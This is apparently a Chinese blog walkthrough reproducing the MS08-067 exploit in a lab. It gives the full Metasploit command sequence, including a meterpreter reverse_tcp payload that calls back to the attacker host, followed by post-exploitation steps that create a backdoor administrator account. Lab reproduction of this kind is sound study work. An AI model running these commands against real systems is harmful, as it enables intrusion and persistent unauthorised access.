MS08-067渗透攻击复现

子怡 发布于 2023-06-04 99 次阅读

AI 摘要

MS08-067渗透攻击复现 收集目标网段下的情况,启动Metasploit进行搜索漏洞ms08-067,设置攻击模块和载荷,目标IP和端口,并开始攻击。接着进行后续渗透,查看权限并添加用户账户到管理员组。通过命令检查用户权限是否成功。

1、收集目标网段下的情况

nmap 192.168.23.0/24

这里可以得知目标机器(192.168.23.137)在线

2、启动Metasploit

msfconsole

3、搜索漏洞ms08-067

search ms08-067

4、使用攻击模块,设置攻击载荷,设置目标,设置攻击方IP和端口,设置target

use 0
set payload windows/meterpreter/reverse_tcp
set rhost 192.168.23.137
set lhost 192.168.23.131
set lport 4444
set target 6

5、开始攻击

run

攻击成功

6、后渗透

查看权限

getuid

执行shell,添加用户账户,并添加到管理员组

shell
net user zjydiary 123456 /add
net localgroup administrators zjydiary /add

Winxp打开CMD查看刚刚创建的用户是否为管理员

net localgroup administrators

可以看到是的